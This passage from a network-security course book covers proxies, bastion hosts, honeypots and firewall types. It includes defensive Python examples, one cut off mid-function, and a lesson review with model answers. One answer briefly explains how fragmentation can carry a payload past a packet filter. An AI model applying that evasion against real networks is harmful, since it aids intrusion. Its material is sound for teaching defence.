The proxy server needs to be configured to work in both directions, just as a packet filter is. This is the only way to be sure no packets are passed by the proxy server.
Proxy Benefits
There are several benefits, from a security point of view, that a proxy can provide to the network. The list of advantages can be large; the major benefits are:
Client invisibility.
Content filtering.
Single point of logging.
Client Invisibility
The basic proxy process highlights this feature. The ability to have the client's inside IP address never appear on the Internet is a great benefit. Attackers who do not know the internal structure of the network have a harder time gaining access and attacking internal clients.
Content Filtering
In the modern era, businesses have to be very sensitive to the needs of employees. This includes preventing exposure to offensive material, as much as can be done.
Content filters can be programmed for many types of inspection. They may be programmed to look for certain keywords or phrases. Many employers use filtering to block the websites of major headhunters and resume posting sites.
These filters can also be used to prevent ActiveX controls from being downloaded, Java applets from being run, or executables from being attached to email.
Single Point of Logging
One of the more significant benefits of proxy servers may be the ability to have a single point of reference for logging data. Since all traffic is flowing through a single point, it is relatively easy to re-create an entire session of web browsing for a user in order to identify problems.
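As an added illustration (not the course's or any product's code) of the proxy process, content filtering and single point of logging described above, here is a toy WWW proxy in Python. The remote web server is replaced by a constructed stand-in that records the source address it sees, so the example runs offline and shows that the client's address never reaches the server; the proxy address, host names, pages and rules are all assumed sample values.

```python
from dataclasses import dataclass, field

PROXY_ADDR = "192.0.2.1"   # constructed address of the proxy's outside interface


@dataclass
class Request:
    client: str    # internal client address; never placed in the outbound request
    service: str   # "www", "ftp", "smtp", ...
    host: str
    path: str


@dataclass
class Response:
    status: int
    content_type: str
    body: str


@dataclass
class ProxyRules:
    # Services this proxy is configured for; anything else has no proxy and is refused.
    allowed_services: set = field(default_factory=lambda: {"www"})
    blocked_hosts: set = field(default_factory=lambda: {"jobs.example"})
    blocked_keywords: tuple = ("confidential",)
    # Constructed MIME types standing in for executables and ActiveX controls.
    blocked_types: tuple = ("application/x-msdownload", "application/x-oleobject")


class WwwProxy:
    def __init__(self, rules, fetch):
        self.rules = rules
        self.fetch = fetch   # fetch(src_addr, host, path) -> Response
        self.log = []        # the single point of logging

    def _record(self, req, verdict, reason):
        self.log.append({"client": req.client, "host": req.host,
                         "path": req.path, "verdict": verdict, "reason": reason})

    def handle(self, req):
        # Stage 1: consult the rules for this service before anything is forwarded.
        if req.service not in self.rules.allowed_services:
            self._record(req, "DENY", "no proxy configured for service")
            return Response(403, "text/plain", "service not permitted")
        if req.host in self.rules.blocked_hosts:
            self._record(req, "DENY", "host blocked")
            return Response(403, "text/plain", "site blocked by policy")
        # A new request leaves the proxy; its source is the proxy, not the client.
        upstream = self.fetch(PROXY_ADDR, req.host, req.path)
        # Stage 2: the returned page is inspected before it is handed to the client.
        if upstream.content_type in self.rules.blocked_types:
            self._record(req, "DENY", "blocked content type")
            return Response(403, "text/plain", "download blocked by policy")
        if any(k in upstream.body.lower() for k in self.rules.blocked_keywords):
            self._record(req, "DENY", "keyword match")
            return Response(403, "text/plain", "page blocked by policy")
        self._record(req, "ALLOW", "")
        # A fresh reply is built for the client with the page as its payload.
        return Response(upstream.status, upstream.content_type, upstream.body)


def make_fake_server():
    """Constructed stand-in for the remote web server; records the source it saw."""
    seen = []
    pages = {
        ("www.example", "/index.html"): Response(200, "text/html", "<h1>Welcome</h1>"),
        ("www.example", "/setup.exe"): Response(200, "application/x-msdownload", "MZ..."),
        ("www.example", "/memo.html"): Response(200, "text/html", "CONFIDENTIAL draft"),
    }

    def fetch(src_addr, host, path):
        seen.append(src_addr)
        return pages.get((host, path), Response(404, "text/plain", "not found"))

    return fetch, seen


def run_scenario():
    """Push five constructed client requests through the proxy."""
    fetch, seen = make_fake_server()
    proxy = WwwProxy(ProxyRules(), fetch)
    reqs = [
        Request("10.0.0.5", "www", "www.example", "/index.html"),   # allowed page
        Request("10.0.0.5", "www", "www.example", "/setup.exe"),    # executable download
        Request("10.0.0.6", "www", "www.example", "/memo.html"),    # keyword match
        Request("10.0.0.6", "www", "jobs.example", "/"),            # blocked host
        Request("10.0.0.7", "telnet", "www.example", "/"),          # no proxy for telnet
    ]
    statuses = [proxy.handle(r).status for r in reqs]
    return statuses, seen, proxy.log
```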
Proxy Problems
Even though it seems as if there are only benefits to adding proxies, and in most cases this may be true, you need to be aware of the potential problems of using proxies. As with all technologies, there are possible issues that may arise, such as:
Single point of failure.
A proxy for each service.
Default configurations.
Single Point of Failure
Perhaps one of the most serious issues with a proxy server is the creation of a single point of failure. If the entire network is running through the same proxy, that machine becomes quite critical and must be configured properly.
A common mistake is to forget that the proxy itself is unprotected. Although it is protecting the internal network, if it has an interface directly connected to the Internet, it is wide open to attack, both denial of service and intrusion attempts.
Be sure that the proxy is used in addition to other security mechanisms (such as a packet filter) that reduce the likelihood of a direct intrusion attack on the proxy. If the entire network is dependent on this machine, you need to take good care of it!
A Proxy for Each Service
More of a configuration issue, but still worth noting, is that the proxy must be configured for each service. If the network allows many different types of services in both directions, this can create considerable work. When services are added, it is important that the proxy server remain securely configured.
Default Configurations
The majority of proxy server software is designed for functionality over security. The applications are created to get users up and running quickly and give them access to the resources they need.
This is the opposite of security. Therefore, when implementing a proxy, it is recommended not to use the default configuration. Take the time to implement the rules and restrictions as they are needed.
TASK 4D-1
Diagram the Proxy Process
1. Diagram the process of an internal client in the network requesting an
email message from the remote server running SMTP.
Topic 4E
The Bastion Host
In order to create a firewall or proxy, there must be a platform for the software to use. In some instances, there is a dedicated piece of hardware that will run the firewall software. In this topic, you will learn about the process of setting up a server to run the software. This server is called the bastion host.
Bastion host is a term used for a computer that has been hardened much more thoroughly than any other computer in the network. This server uses every security option that comes with the operating system, to the fullest extent it can be used. All auditing has been configured, all authentication has been configured, and encryption (where relevant) has been configured.
Further configuration would be the removal of all services and applications not deemed absolutely necessary for the server to function. All user accounts are removed, except for those required for server management. Every service, application, and user account that is removed is one less target for a potential attacker.
Once the computer has been configured, the software may be installed and configured on top of the base operating system. This computer should not be considered the single line of defense, but rather one link in a chain. The security of the network cannot rely on a single component, so the bastion host is one of several in a well designed network, as shown in the following figure.
The first line of defense is the router connecting the network to the Internet, which should be configured with appropriate packet filtering. Behind the packet filtering router is where the bastion host running proxy services is located. If the network is small, one bastion host running the proxy services for the entire network may be fine. In a large network, there are likely to be many bastion hosts, each running different proxy services.
Figure 4-13: The most likely location of a bastion host.
The basic steps that must be followed in setting up a host as a bastion are:
Remove unused applications.
Remove unused services.
Remove unused user accounts.
Enable auditing.
Other standard techniques for creating a bastion host to run as a firewall are:
Install the operating system from scratch, formatting the disk first.
Do not use a dual-boot computer.
Remove unused hardware, such as modems or sound cards.
Use very strong authentication methods, such as tokens or biometrics.
Implement a utility to check files for tampering, such as TripWire.
An Attack on the Bastion Host
Since this computer is the machine that provides many services to your network, it is likely to be the target of many different attacks.
However, since you have set up the computer properly ahead of time, you have the ability to deal with these attacks. Since you have enabled logging and auditing, the intrusion should be detected quickly with a scan of the logs and generated reports.
Inevitably, there may be an attack you do not catch right away. It is this part of security that drives administrators mad. Once you catch the intrusion, you must investigate further to determine the cause. This is where your file tampering software comes into play. You must identify whether a Trojan has been placed on the host, or whether any system files have been accessed. Once the bastion host has suffered an intrusion, it is critical that the remaining computers in the DMZ or network be examined quickly for possible intrusions. A compromised bastion host often leads to a compromised network.
An important point must be made about the knee-jerk reaction that many administrators have in these situations, which is to attempt to restore the system from backup once it has been compromised. Unless you can identify the date the intrusion happened, how can you be sure your backup is not also infected?
The best solution is to begin from scratch and re-create the bastion host, starting with formatting the disk. It will take time, but it is the best way to restore this host to the network.
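An added example, not from the course and not TripWire's code, of the kind of file tampering check recommended above: it records a SHA-256 baseline (with size and mode) of a directory tree while the bastion host is known good, and a later run reports modified, added and removed files so an intrusion can be dated against the baseline. The tree, the file names and the simulated tampering are constructed in a temporary directory.

```python
import hashlib
import json
import os
import stat
import tempfile


def _fingerprint(path):
    # Hash the content in chunks so large binaries do not have to fit in memory.
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    st = os.stat(path)
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": stat.S_IMODE(st.st_mode)}


def take_baseline(root):
    """Return {relative path: fingerprint} for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and special files are not fingerprinted
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = _fingerprint(full)
    return baseline


def save_baseline(baseline, path):
    # The baseline is only trustworthy if kept where an intruder cannot alter it
    # (read-only media or another host), so it is written to a separate location.
    with open(path, "w") as fh:
        json.dump(baseline, fh, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, root):
    """Report files whose hash, size or mode changed, plus added and removed files."""
    current = take_baseline(root)
    report = {"modified": [], "added": [], "removed": []}
    for rel, fp in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif fp != baseline[rel]:
            report["modified"].append(rel)
    report["removed"] = sorted(set(baseline) - set(current))
    report["modified"].sort()
    report["added"].sort()
    return report


def demo():
    """Constructed tree: take a baseline, tamper with the tree, return the report."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "sbin"))
        with open(os.path.join(root, "sbin", "login"), "wb") as fh:
            fh.write(b"original login binary")
        with open(os.path.join(root, "hosts"), "wb") as fh:
            fh.write(b"127.0.0.1 localhost\n")
        db = os.path.join(store, "baseline.json")
        save_baseline(take_baseline(root), db)
        # Simulated intrusion: a replaced binary of the same size, a new file,
        # and a deleted file. Only the hash reveals the first change.
        with open(os.path.join(root, "sbin", "login"), "wb") as fh:
            fh.write(b"replaced login binary")
        with open(os.path.join(root, "sbin", "extra"), "wb") as fh:
            fh.write(b"unexpected file")
        os.remove(os.path.join(root, "hosts"))
        return compare(load_baseline(db), root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```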
TASK 4E-1
Describing a Bastion Host
1. Describe the function of a bastion host in creating a secure network
environment.
Bastion host is a term used for a computer that has one or more network interfaces exposed to the Internet. The OS (typically a server OS) on such a device is hardened in a much more secure manner than any other computers in the network. Further configuration would be the removal of all services and applications not deemed absolutely necessary for the server to function. Once the computer has been configured, then the software that dictates rule sets for internal or external traffic may be installed and configured on top of the hardened OS.
Topic 4F
The Honeypot
One area that is the subject of much discussion in security circles is the use and deployment of honeypots. For some security professionals, network security is not fully functional without one, while others feel it is an unneeded and potentially dangerous part of the network.
What is a Honeypot?
Just as honey attracts bears, a honeypot is a computer designed to attract attackers. If an attacker has managed to get past your packet filter into your DMZ and is scanning for options, the honeypot should be the one computer that sticks out. This is depicted in Figure 4-14.
Figure 4-14: Two examples of where the honeypot may be located.
Goals of the Honeypot
There are several goals for the honeypot. You would like the honeypot to provide enough of a lure that attackers stay away from your other equipment. You want the attacker to see a vulnerability that they know they can exploit and use to gain access to the computer. This vulnerability needs to be such that the attacker focuses their energy on exploiting this computer, as opposed to the email server (for example) sitting right next to it.
In addition to keeping attackers away from your more secure systems, one of the goals of a honeypot is logging. Knowing that this system is one that will be attacked, you can take extra measures in logging. These logs should be moved off the system frequently, perhaps hourly or daily if your network is a high-profile target.
Another goal of the honeypot is to increase the ability to detect and respond to incidents. The theory is that if you are aware of what the attacker is doing to your honeypot, you can be better prepared to defend against or, if possible, prevent that attack from being carried out successfully against your production systems.
To take the concept of the honeypot further, there are instances of honeynets. A honeynet is an entire network designed to be an attractive alternative to the production network(s) it is deployed to screen from view. The premise is the same; only the scale is bigger.
Legal Issues
A discussion of honeypots would not be complete without a discussion of the legal issues surrounding this use of technology. Perhaps the single biggest issue involving a honeypot today is the issue of entrapment. Some people feel that the setup of a honeypot is entrapment, and therefore the same rules apply as in the real world. Up to this point, that is not yet the case, although it should be noted that defense attorneys have tried using entrapment as a defense.
Another issue is that of privacy. If an attacker were to set up an IRC server on the honeypot, it is possible for the administrator to log all conversations on that server. For now, this issue is more of a moral and ethical dilemma than a legal one, since there is no defined law regarding this subject. However, it should be noted again that this could be a viable defense for an attorney to work with.
The current standard for this issue is Searching and Seizing Computers and Obtaining Electronic Evidence in Criminal Investigations, a publication of the Computer Crime and Intellectual Property Section (CCIPS), Criminal Division, United States Department of Justice. The entire document can be found at www.usdoj.gov/criminal/cybercrime/searching.html#searchmanual
TASK 4F-1
Honeypot Configuration
1. What are the services most likely to be enabled in creating a honeypot, and why?
Most likely services would include the normal WWW, FTP, SMTP, POP3, and Telnet. It is important to offer the normal services, since the honeypot must appear to be a productive, live computer in the network, and should be configured the same as a production WWW server, perhaps with looser permissions and solid logging.
Summary
In this lesson, you identified the major components used in building firewall systems and learned to detail the methods used to create a firewall policy in a network scenario. You now know how packet filters are used in firewall systems. You can also describe the process of creating a bastion host, as well as how to use proxy servers in firewall systems. You are also aware of the process involved in creating a honeypot and can differentiate between a honeypot and a honeynet.
Lesson Review
4A Name two methodologies for firewalls.
Packet filtering and proxy servers (application gateway).
What are three services a firewall can provide?
Network Address Translation (NAT), data caching, and restricting access to content.
How can a second connection to a client computer make an impact on firewall security?
A second connection will render much of the firewall useless to this client, and maybe even the network.
Name four different methods of implementing a firewall.
A Single Packet Filtering Device.
A Multi-homed Device.
A Screened Host.
A Demilitarized Zone.
4B What is the difference between a firewall policy and a security policy?
A firewall policy is generally a subset of the overall security policy.
List three items that should be in a security policy, but not part of a firewall policy.
Many portions of the following items may address issues broader than those addressed by the firewall policy:
The Acceptable Use Statement.
The Network Connection Statement.
The Contracted Worker Statement.
List at least three items that would be specific to the firewall policy.
Answers may include: Users may access WWW on port 80 as required; users may not access NNTP on any port; users not in subnet 10.0.10.0 are not allowed to Telnet to any location; any policies dealing with firewall administration.
4C What is the primary difference between stateful and stateless packet filters?
Stateless packet filters make a decision about a packet based on any portion of the protocol header; however, the vast majority of filters are based on the most significant information in the header.
Stateful packet filters encompass the techniques used by stateless packet filters; however, they do not base their decisions on individual packets. Stateful packet filters increase security by remembering the state of connections at the network and the session layers as they pass through the filter. This session information is stored and analyzed on all packets moving through the filter.
In addition to IP addresses, what else can a packet filter use to make a decision on a packet?
Fragmentation, IP Protocol ID, Protocol Type, and TCP or UDP Port Numbers.
How can an attacker use fragmentation to get through a packet filter?
By encapsulating the entire payload in one or more fragments following the first fragment.
4D What are the benefits of implementing a proxy server?
While packet filters allow for direct communication between a client and a server, proxy servers prevent it. The proxy works at the application layer (application gateway). Proxies can inspect packet content and make decisions based on this inspection.
Describe three potential problem issues for proxy servers.
Single point of failure: If the entire network is running through the same proxy, that machine becomes quite critical, and must be configured properly. The proxy itself is unprotected if there is an interface directly connected to the Internet. You have to add at least a packet filter in front of the proxy.
A proxy for each service: The proxy must be configured for each service. If the network allows many different types of services in both directions, this can create considerable work.
Default configuration: Using the default (out-of-the-box) configuration is generally not secure.
4E What are the steps that must be followed to create a bastion host?
1. Remove unused applications.
2. Remove unused services.
3. Remove unused user accounts.
4. Enable auditing.
What are some additional steps that are recommended in securing the bastion host?
Install the operating system from scratch, formatting the disk first. Do not use a dual-boot computer. Remove unused hardware, such as modems or sound cards. Use very strong authentication methods, such as tokens or biometrics. Implement a utility to check files for tampering, such as TripWire.
How should a compromised bastion host be recovered?
A compromised bastion host often leads to a compromised network. Once the bastion host has had an intrusion, it is critical that the remaining computers in the DMZ or network be examined quickly for possible intrusions. Identify the date of the intrusion before you restore the bastion host from backup. The best solution is to begin from scratch and re-create the bastion host, starting with formatting the disk.
4F Where should a honeypot be located in the network?
In the screened subnet or DMZ.
What are two of the goals of a honeypot?
Answers may include: Lure the attacker; log visits; and respond to incidents.
What are some potential legal issues of honeypots?
Entrapment and privacy issues.
LESSON 5
Configuring Firewalls
Overview
In this lesson, you will first review firewalls from a conceptual viewpoint to learn about the types of firewalls, how each of these types works, and what protection they can provide for your network. After you have the foundational concepts under your belt, you will go through a series of exercises to actually implement two different firewall solutions: Microsoft's Internet Security and Acceleration Server, which runs on top of the Windows platform, and IPTables, which runs on top of the Linux platform. This will provide you with the practical working knowledge to implement a firewall in your network environment.
Objectives
To configure network firewalls in the defense of a network, you will:
5A Describe standard firewall functionality and common implementation practices.
Firewalls come in a wide variety of flavors today. In addition to the many vendor offerings, there are also many versions of "build your own" firewalls. Regardless of the firewall implementation you are working with, there are commonalities between them, both functionally and in implementation methodologies. Exploring these commonalities will provide you with a solid foundation for developing mastery of firewall implementation.
5B Install, configure, and monitor Microsoft ISA Server 2006.
In this topic, you will install Microsoft ISA Server 2006 and work with the built-in configuration tools. In addition, you will explore options for managing, monitoring, and auditing ISA Server 2006.
5C Examine the concepts of Linux IPTables.
In this topic, you will examine how IPTables creates a chain of rules that can control the egress and ingress of specific network traffic. IPTables is a popular build-your-own type of firewall that you will find implemented in many networks.
5D Apply firewall concepts and knowledge to a scenario.
In this topic, you will be given a specific network situation, and you will then design firewall topology and rule sets to create the required firewall security posture.
Data Files
ISAScwHlpPack.exe
Lesson Time
5 hours
Lesson 5: Configuring Firewalls 189
Topic 5A
Understanding Firewalls
Technology-based firewalls first appeared on the networking scene in the early 1990s. As the Internet and networks in general have developed and progressed, so have the potential digital dangers. Firewalls have progressed right alongside, developing from simple gatekeepers to comprehensive security tools that can work in conjunction with intrusion detection systems and malware scanners.
Security has become increasingly problematic for systems connected to the Internet. Network intrusions and attacks have now become so common that the risk is understood as an unavoidable part of conducting business in the digital age. In a modern network, firewall technology is a mainline component for any organization that has defined a network security architecture. Even home users connected to the Internet through commercial ISP connections regularly install software and hardware firewalls to provide a measure of protection for their personal systems.
Fear not: in this module we are going to lift the veil of mystery and discover what a firewall does and how firewalls actually work. Firewalls generally comprise the first line of defense for a network and, therefore, a solid working understanding of firewalls is essential in today's networked world. You will also examine how to implement and configure two popular platform-specific firewalls: Microsoft Internet Security and Acceleration Server 2006 and the built-in Linux firewall, IPTables. Let's examine some firewall basics now.
Firewall Basics
A basic understanding of what firewalls are and how they work will give us a common frame of reference. We can then build our practical skills on top of this framework when we investigate how to implement and configure our two firewalls. This will be most effective if we can derive the answers to the following questions:
What is a network firewall?
What are common firewall related terms?
What are the basic functions of a firewall?
What do addresses, ports, protocols, and services have to do with a firewall?
What are the common types of firewalls?
How are firewall rules built?
What are the common firewall network topologies?
Why would I want a firewall?
What can a firewall not protect me from?
What is a Network Firewall?
A firewall can be described as a security mechanism that places limiting controls on all inbound and outbound network communications between individual systems or entire networks of systems, by permitting, denying, or acting as a proxy for all data connections.
Figure 5-1: Firewalls control network communication.
A firewall generally consists of a software program (code) working in conjunction with a hardware device that is responsible for physically transmitting network data. Firewalls can exist as a software program installed on top of an operating system or as a specialized hardware device running proprietary code. Depending on the size and complexity of the environment being protected, firewalls can be configured as a single system or as multiple systems working in concert.
Many firewalls are capable of handling multiple types of transport protocols (TCP/IP, IPX/SPX, etc.). However, for the purposes of our discussion here, we will operate under the assumption that you are going to be using the current industry standard, TCP/IP, as your network transport protocol of choice.
Firewall Terms
We know that networks are made up of multiple connected systems, all with varying degrees or levels of trust between them. Your daily interactions with the network of humans around you are a good illustration of the principle of networked trust. For example, you might trust your best friend with the keys to your car, but certainly not the person you just met at the car wash.
In a networked environment, these areas of interaction can be referred to as zones of trust. Some common examples of these zones would be the Internet, which is a zone with little or no trust, and your internal network, which would be a zone with a high level of trust.
Figure 5-2: Firewalls separate zones of trust.
The networking world has spawned a variety of terms such as Internet, Extranet,
intranet, and DMZ. We can use these terms to dene the zones of trust that com-
monly occur in any given network environment.
Internet: This zone of trust corresponds to the worldwide public network of systems. Since this zone is accessible by anyone, it is our least trusted zone. In firewall terminology, it is often referred to as the unprotected or external network.
Intranet: An intranet is a private network used to share an organization's information or operations securely within the organization. In firewall terminology, it is often referred to as the protected or internal network.
Extranet: This zone of trust is a semi-private network that an organization creates to share parts of its private network with business partners such as customers, suppliers, or other collaborators. It is an extension of the private zone of trust that grants specific types of access to approved outside entities.
DMZ: The demilitarized zone is a network segment (or segments) located between the protected and unprotected networks. DMZs are generally built in one of two basic topologies: chained and three-legged. A chained DMZ sits in a line between the trusted and untrusted zones, with a firewall on either side; a three-legged DMZ hangs off a third interface of a single firewall that also separates the trusted and untrusted zones, forming a third network spoke off the firewall.
Basic Functions of a Firewall
A firewall's primary function is to control communication between systems and/or networks that sit in zones with differing trust levels. Controlling network communication across zones of trust lets us enforce our security policy: we can build a connectivity model on the principle of least privilege and grant varying levels of access based on the source, destination, and type of network communication.
Figure 5-3: Firewalls enforce access rules between zones of trust.
192 Tactical Perimeter Defense
Address, Port, Protocol, and Services: The Building
Blocks of Firewall Rules
To understand what a firewall does, it helps to review briefly how network communication works, especially over the Internet Protocol. All IP communications share several properties, and it is these common properties that allow a firewall to perform most of its functions. Five basic attributes are generally present in network communication over IP:
Source address: Where the communication originated.
Destination address: Where the communication is going.
Protocol used: TCP, UDP, ICMP, IGMP, and so on.
Target port: A port is an endpoint of a logical network connection. The destination port number is how a request names a specific service on a remote system; the client side of a connection also uses a source port, which a firewall can examine. (Well-known port numbers were once listed in RFC 1700; that RFC has been obsoleted by RFC 3232, and the authoritative list is now the online IANA Service Name and Transport Protocol Port Number Registry.)
Service: The application that offers the data or functionality requested by the connection. Services generally listen for requests on a specific port over a specific protocol.
We use similar types of mechanisms in our non-digital daily lives to move infor-
mation from one place to another. A good example of this would be returning a
defective computer part to a manufacturer.
We know that we are sending the part from ourselves (the Source).
Then, we obtain the manufacturer's address (the Destination).
We decide on a shipper: FedEx, UPS, DHL, etc. (the Protocol).
We also add "Attention: RMA department" to the label (the Port).
Because of how we addressed, shipped, and labeled the package, when it
arrives at the manufacturer, it will be handed over to the warranty service
department for repair or replacement (the Service).
From this example, you can see that the concepts of source, destination, protocol, port, and service are familiar from daily life. For a firewall, these common attributes of network communication form the building blocks of the rule sets it uses to control access to and from network entities.
Firewalls and the OSI Model
To simplify the complexities of networking heterogeneous systems, it is often useful to use the Open Systems Interconnection (OSI) model as a frame of reference. The OSI model is an abstraction of network communication between computer systems and network devices.
Lesson 5: Conguring Firewalls 193
Figure 5-4: The Open Systems Interconnection (OSI) model.
In a nutshell, the layers of the OSI model perform the following functions:
Layer 7: Application - Interface from network to applications
Layer 6: Presentation - Handles data representation and encryption
Layer 5: Session - Manages connections between applications
Layer 4: Transport - Provides end-to-end connections and reliability
Layer 3: Network - Path determination and logical addressing (IP)
Layer 2: Data Link - Physical addressing (MAC) and logical link control (LLC)
Layer 1: Physical - Media, signal, and binary transmission
A full discussion of the OSI model is outside the scope of this module, but the layers relevant to firewalls will help us understand how they function. Current firewall technology operates on the OSI layers shown in the following figure.
Figure 5-5: Firewalls operate at Layers 2, 3, 4, and 7 of the OSI model.
Firewalls generally operate at OSI Layers 2, 3, 4, and 7. The common attributes we examined earlier (source and destination address, protocol, port, and service) map onto these layers of the OSI model.
Layer 2 (Data Link) is the lowest layer that carries addressing able to uniquely identify a single source or destination. These are MAC (Media Access Control) addresses, assigned to physical network interfaces; the MAC address of a standard Ethernet card is a Layer 2 address. A firewall can use Layer 2 addresses to discriminate between sources and destinations, though only on the directly attached segment, since MAC addresses do not survive a router hop.
Layer 3 (Network) provides logical addressing and routing: it assigns IP addresses to hosts, determines the path a packet takes, and forwards packets from node to node across network boundaries. Like Layer 2, Layer 3 gives a firewall source and destination addresses to discriminate on, and because IP addresses are end-to-end they are the addresses firewall rules are normally written against.
Layer 4 (Transport) provides end-to-end communication between processes on the communicating hosts. This is the layer of the transport protocols TCP and UDP, and where source and destination ports are specified. (ICMP, often listed alongside them in firewall rules, is strictly a Layer 3 companion to IP; a firewall filters it by type and code rather than by port.) Firewalls examine the protocol and port information from Layer 4 and use those values to control communication.
Layer 7 (Application) supports both applications (services) and end-user processes. This is where communication partners, authentication, quality of service, and data syntax are identified. Everything at this layer is application specific: data is passed from the program in an application-specific format, then encapsulated and handed to the layers below. A firewall can use service-specific information found at the application layer to inspect and control inbound and outbound communication and so improve your security posture.
Coverage of the additional layer lets the firewall handle advanced applications and protocols. User authentication is a good example: a simple firewall that functions only at Layers 2 and 3 cannot normally distinguish individual users, whereas a firewall with application-level (Layer 7) awareness can enforce communication policies based on user authentication.
Classifying Firewalls
Firewalls have continued to evolve since their inception and are growing more sophisticated. As with any sophisticated system, a classification scheme aids understanding. The simplest way to classify firewalls is by how they handle the process of controlling network communication.
Is the communication control being done between a single system and a network, or between two or more network segments?
Firewalls that control communication with a single system are generally called Personal Firewalls.
Firewalls that control communication between network segments are called Network Firewalls.
Is the communication intercepted and inspected at the network layer or at the application layer?
Network-layer firewalls are called Packet Filter Firewalls.
Application-layer firewalls are called Application Gateways or Proxy Firewalls.
Is the communication state being tracked and maintained by the firewall?
If the firewall does not track connection state, it is classified as a Stateless Firewall.
If the firewall tracks the state of connections, it is classified as a Stateful Firewall.
Examining the Common Types of Firewalls
For both Personal Firewalls and Network Firewalls, there are three common types of firewall in general use today: Simple Packet Filter Firewalls, Stateful Packet Filter Firewalls, and Application Level Firewalls. Let's examine the strengths and weaknesses of each.
Simple Packet Filtering Firewalls
Simple packet filters are the most fundamental type of firewall. They inspect each inbound or outbound packet individually and compare it against a rule set to determine whether the packet should be permitted or denied.
In their most basic form, packet filter firewalls operate at OSI Layers 2 (Data Link) and 3 (Network). They provide network access control by comparing the rule set to information contained in each packet, such as:
The source address of the packet: the IP address of the system the packet originated from.
The destination address of the packet: the IP address of the system the packet is sent to.
The network protocol used between the source and destination addresses.
Some simple packet filters also examine Layer 4 characteristics such as the source and destination ports of the connection.
If the firewall is multi-homed to three or more network segments (as in a three-legged DMZ configuration), the packet filter also takes into account which firewall interface the packet arrived on and which interface it will leave through.
Figure 5-6: OSI Layers of inspection for a Simple Packet Filter Firewall.
Weaknesses of Simple Packet Filter Firewalls
If you are using a simple packet filter firewall, there are several inherent weaknesses you should be aware of and take special care to overcome where possible.
Application Specific Vulnerabilities: Packet filter firewalls do not inspect upper-layer data and therefore cannot protect against intrusions that exploit application-specific vulnerabilities.
Limited Logging: Because the firewall gathers so little information, a simple packet filter has limited logging capability, which limits the data available for policy decisions and can hamper intrusion investigations.
No Authentication: Because they operate at OSI layers below where authentication happens, simple packet filter firewalls generally cannot use user authentication as part of their control mechanisms.
Vulnerable to Spoofing: There are weaknesses in the TCP/IP specification and protocol stack that packet filters have a hard time overcoming; network-layer address spoofing is a good example. A simple packet filter has no way to tell whether the Layer 3 source address in a packet is genuine, which leaves it open to spoofing attacks. The practical defense is anti-spoofing (ingress) rules: drop packets arriving on the external interface that claim an internal source address, and drop packets leaving the internal interface that do not carry one.
Large Attack Surface: Another weakness of simple packet filters stems from the way TCP connections are established. A client requests a service on a well-known low-numbered port (0 to 1023) while its own end of the connection uses a random ephemeral port above 1023, and the server's replies are addressed to that ephemeral port. A stateless filter cannot know which ephemeral port belongs to which connection, so to let replies back in you normally have to open all ports above 1023 inbound. This leaves a very large attack surface exposed to the outside network.
Easy to Misconfigure: Simple packet filter firewalls have very few variables to use for inspection and rule creation. When attempting to build complex and comprehensive rule sets, it is easy to write a rule that allows, or fails to deny, traffic your network policy says should be denied. Conversely, it is also easy to block traffic that should be permitted.
Stateful Packet Filter Firewalls
We have seen that simple packet filter firewalls operate at Layers 2 and 3 of the OSI model. The stateful packet filter adds Layer 4 awareness on top of Layers 2 and 3. Because they keep track of logical virtual connection circuits, these firewalls are also sometimes loosely referred to as circuit-level firewalls.
Figure 5-7: OSI Layers of inspection for a Stateful Packet Filter Firewall.
Stateful packet filters control traffic in basically the same manner as a simple packet filter, using rule sets, but they add intelligence that improves performance and solves several of the simple packet filter's problems.
The stateful label comes from the fact that these firewalls record the state of every accepted connection in a table held in memory. This lets the firewall determine whether an incoming packet opens a new connection or belongs to an existing, established one.
Once a connection has ended or timed out, its entry in the state table is discarded. Some applications send periodic keepalive packets to stop the firewall from expiring the connection during periods of low user activity.
Figure 5-8: Example of a connection state table.
This ability to distinguish new connections from existing ones gives this type of firewall several advantages over a simple packet filter.
Lower Attack Footprint: Stateful firewalls can take additional actions based on the state table, such as dynamically admitting return traffic for each individual connection instead of opening every high port. This lowers your attack footprint and improves your security posture.
Less Susceptible to Spoofing: A stateful firewall holds key attributes of each connection in memory to track its state: the IP addresses and ports at both ends, and for TCP the sequence numbers of the packets flowing through it. Because an injected or spoofed packet must match the addresses, ports, and expected sequence window of a live connection, a stateful firewall is far less susceptible to spoofing.
Easy Black Hole Configuration: A stateful firewall can easily be configured to pass all outgoing packets but admit incoming packets only when they belong to an established connection listed in the state table. This prevents intruders from initiating unsolicited connections to resources in the protected network. Combined with a rule to discard unsolicited packets silently, this turns your network into a black hole on the Internet.
Less Resource Intensive: Tracking connection state makes packet inspection more efficient. Packets belonging to existing connections only have to be checked against the state table, which is cheaper than evaluating them against the full filter rule set.
Stateful inspection firewalls share some of the weaknesses of packet filter firewalls; however, the advantages of the state table mean that stateful inspection firewalls are generally more secure than simple packet filters.
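The following is an added example, not code from the book: a minimal stateful packet filter in Python that implements the in-memory state table, the "pass outbound, admit only established inbound" black-hole policy, and the idle timeout with keepalive refresh described above. The addresses, the packet trace and the timeout value are all constructed for illustration.

```python
"""Stateful packet filter with an in-memory connection table (added example,
not the book's code).

Policy: traffic leaving the protected zone is allowed and recorded; traffic
arriving from the untrusted zone is accepted only when it belongs to a
connection an inside host opened.  Entries expire after an idle timeout;
a packet on a live connection (including an application keepalive)
refreshes the timer.  Times are passed in explicitly so runs are
deterministic; IDLE_TIMEOUT is a constructed value.
"""

IDLE_TIMEOUT = 300   # seconds of silence before a state entry is discarded


class StatefulFilter:
    def __init__(self, timeout=IDLE_TIMEOUT):
        self.timeout = timeout
        # key: (proto, inside_ip, inside_port, outside_ip, outside_port)
        # value: time the connection last carried a packet
        self.table = {}

    def _expire(self, now):
        """Drop every entry whose idle time exceeds the timeout."""
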